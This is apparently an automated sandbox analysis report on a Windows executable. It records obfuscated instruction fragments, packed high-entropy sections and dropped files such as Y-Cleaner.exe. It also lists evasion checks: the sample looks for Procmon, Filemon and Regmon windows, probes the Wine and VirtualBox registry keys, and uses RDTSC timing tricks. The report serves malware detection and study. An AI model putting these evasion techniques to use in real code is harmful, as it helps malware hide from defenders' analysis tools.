Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_009960C9 push 3D4F0EC3h; mov dword ptr [esp], ebx0_2_009962A3
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_009960C9 push esi; mov dword ptr [esp], ecx0_2_009962FC
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_009960C9 push 0CB51619h; mov dword ptr [esp], ecx0_2_00996391
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_009960C9 push 5219BC5Eh; mov dword ptr [esp], edi0_2_009963A9
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_009960C9 push 0EB0723Eh; mov dword ptr [esp], ecx0_2_00996414
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_009960C9 push ecx; mov dword ptr [esp], edi0_2_00996440
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_009960C9 push 32C01D6Ah; mov dword ptr [esp], ebp0_2_00996448
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_009960C9 push 57C1BFA0h; mov dword ptr [esp], ecx0_2_0099656D
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_009960C9 push 45F335D1h; mov dword ptr [esp], ebx0_2_009965DF
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_009960C9 push 12267BD9h; mov dword ptr [esp], eax0_2_0099661D
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_009960C9 push 7D92C803h; mov dword ptr [esp], eax0_2_00996693
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_009960C9 push eax; mov dword ptr [esp], esi0_2_00996778
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_009960C9 push ecx; mov dword ptr [esp], eax0_2_009967C5
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_009960C9 push edi; mov dword ptr [esp], 4C6AE71Ch0_2_00996826
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_009960C9 push eax; mov dword ptr [esp], ecx0_2_009968A9
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_009960C9 push 00726B91h; mov dword ptr [esp], ebx0_2_009968D2
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_009960C9 push eax; mov dword ptr [esp], 13E69211h0_2_009968D7
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_009960C9 push 432C3B47h; mov dword ptr [esp], ebx0_2_009969A8
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_009960C9 push ecx; mov dword ptr [esp], esi0_2_009969B6
Source: dI3n4LSHB7.exeStatic PE information: section name: ghfuhyhn entropy: 7.948515761931662
Source: Y-Cleaner.exe.0.drStatic PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].0.drStatic PE information: section name: .text entropy: 7.918511524700298
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]Jump to dropped file
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeFile created: C:\Users\user\AppData\Local\Temp\eEwf3ZG9fBWYD5w\Y-Cleaner.exeJump to dropped file
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeFile created: C:\Users\user\AppData\Local\Temp\eEwf3ZG9fBWYD5w\Bunifu_UI_v1.5.3.dllJump to dropped file
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]Jump to dropped file

Boot Survival

barindex
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 81CA88 second address: 81CA94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 81CA94 second address: 81CA9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 81CA9A second address: 81CA9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 99D875 second address: 99D8B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF4C0C3E16Ch 0x00000009 pushad 0x0000000a popad 0x0000000b je 00007FF4C0C3E166h 0x00000011 popad 0x00000012 jng 00007FF4C0C3E16Eh 0x00000018 pushad 0x00000019 popad 0x0000001a jnc 00007FF4C0C3E166h 0x00000020 jnl 00007FF4C0C3E172h 0x00000026 je 00007FF4C0C3E16Eh 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 99CD2C second address: 99CD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007FF4C0501596h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 99CD3B second address: 99CD41 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 99CD41 second address: 99CD65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 jmp 00007FF4C05015A9h 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 99CFF5 second address: 99CFF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 99CFF9 second address: 99D012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FF4C0501596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FF4C050159Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 99F87A second address: 99F946 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E170h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c call 00007FF4C0C3E170h 0x00000011 mov cl, 1Eh 0x00000013 pop esi 0x00000014 push 00000000h 0x00000016 call 00007FF4C0C3E16Bh 0x0000001b mov dword ptr [ebp+122D1861h], esi 0x00000021 pop edx 0x00000022 push 934F3E1Bh 0x00000027 jg 00007FF4C0C3E17Ch 0x0000002d add dword ptr [esp], 6CB0C265h 0x00000034 push 00000003h 0x00000036 push edx 0x00000037 mov ecx, dword ptr [ebp+122D3773h] 0x0000003d pop edi 0x0000003e push 00000000h 0x00000040 mov dword ptr [ebp+122D1919h], esi 0x00000046 push 00000003h 0x00000048 sub edi, 3433ED28h 0x0000004e push 55DD7160h 0x00000053 jmp 00007FF4C0C3E16Eh 0x00000058 add dword ptr [esp], 6A228EA0h 0x0000005f jmp 00007FF4C0C3E170h 0x00000064 lea ebx, dword ptr [ebp+1245671Ah] 0x0000006a pushad 0x0000006b mov edx, dword ptr [ebp+122D37E3h] 0x00000071 mov edi, ecx 0x00000073 popad 0x00000074 push eax 0x00000075 push eax 0x00000076 push edx 0x00000077 jmp 00007FF4C0C3E16Fh 0x0000007c rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 99FA08 second address: 99FA8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF4C05015A3h 0x0000000b popad 0x0000000c xor dword ptr [esp], 7B3E6F54h 0x00000013 push ebx 0x00000014 mov ecx, dword ptr [ebp+122D37CFh] 0x0000001a pop edi 0x0000001b push 00000003h 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007FF4C0501598h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 0000001Ch 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 push 00000000h 0x00000039 xor dword ptr [ebp+122D22B3h], edx 0x0000003f push 00000003h 0x00000041 jmp 00007FF4C05015A8h 0x00000046 push 828363E1h 0x0000004b push eax 0x0000004c push edx 0x0000004d jg 00007FF4C050159Ch 0x00000053 jp 00007FF4C0501596h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 99FA8C second address: 99FA92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 99FA92 second address: 99FA96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 99FA96 second address: 99FAED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 3D7C9C1Fh 0x0000000f jg 00007FF4C0C3E167h 0x00000015 stc 0x00000016 lea ebx, dword ptr [ebp+12456723h] 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007FF4C0C3E168h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 00000016h 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 sub si, 25AFh 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FF4C0C3E175h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 99FAED second address: 99FAF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 99FAF3 second address: 99FAF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 99FB54 second address: 99FB8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 ja 00007FF4C0501598h 0x0000000e jmp 00007FF4C05015A0h 0x00000013 popad 0x00000014 nop 0x00000015 push 00000000h 0x00000017 mov ecx, dword ptr [ebp+122D37CBh] 0x0000001d call 00007FF4C0501599h 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 99FB8C second address: 99FB90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 99FB90 second address: 99FB9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 99FB9B second address: 99FBCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FF4C0C3E173h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007FF4C0C3E16Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 99FBCC second address: 99FBD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 99FBD1 second address: 99FC79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push edx 0x0000000d jmp 00007FF4C0C3E171h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 jmp 00007FF4C0C3E16Ah 0x0000001c pop eax 0x0000001d jmp 00007FF4C0C3E16Bh 0x00000022 push 00000003h 0x00000024 push 00000000h 0x00000026 movzx esi, ax 0x00000029 jmp 00007FF4C0C3E16Bh 0x0000002e push 00000003h 0x00000030 movzx edi, dx 0x00000033 call 00007FF4C0C3E169h 0x00000038 jmp 00007FF4C0C3E178h 0x0000003d push eax 0x0000003e jnl 00007FF4C0C3E180h 0x00000044 mov eax, dword ptr [esp+04h] 0x00000048 jmp 00007FF4C0C3E16Bh 0x0000004d mov eax, dword ptr [eax] 0x0000004f push ecx 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 pop eax 0x00000054 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 99FC79 second address: 99FC7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9BEDDF second address: 9BEDED instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF4C0C3E166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9BF1FE second address: 9BF208 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF4C050159Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9BF58F second address: 9BF593 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9BF593 second address: 9BF5AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF4C050159Fh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9BF5AB second address: 9BF5B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9BF909 second address: 9BF90D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9BF90D second address: 9BF911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9BF911 second address: 9BF919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9BFD24 second address: 9BFD28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9BFD28 second address: 9BFD47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF4C05015A4h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9B51F7 second address: 9B51FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9B51FD second address: 9B5204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9C0681 second address: 9C0685 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9C0685 second address: 9C068B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9C068B second address: 9C06C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E16Eh 0x00000007 jmp 00007FF4C0C3E172h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF4C0C3E170h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9C06C1 second address: 9C06C6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9C4D7E second address: 9C4D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9C5450 second address: 9C5471 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jbe 00007FF4C05015C4h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF4C05015A1h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9C65B4 second address: 9C65B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9C65B8 second address: 9C65D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C05015A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9C87A8 second address: 9C87AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9C87AC second address: 9C87B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9C87B0 second address: 9C87B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9C87B6 second address: 9C8805 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF4C05015C0h 0x00000008 jmp 00007FF4C05015A1h 0x0000000d jmp 00007FF4C05015A9h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 jmp 00007FF4C05015A9h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 98F0F2 second address: 98F0F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 98F0F8 second address: 98F0FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 98F0FC second address: 98F10D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF4C0C3E166h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
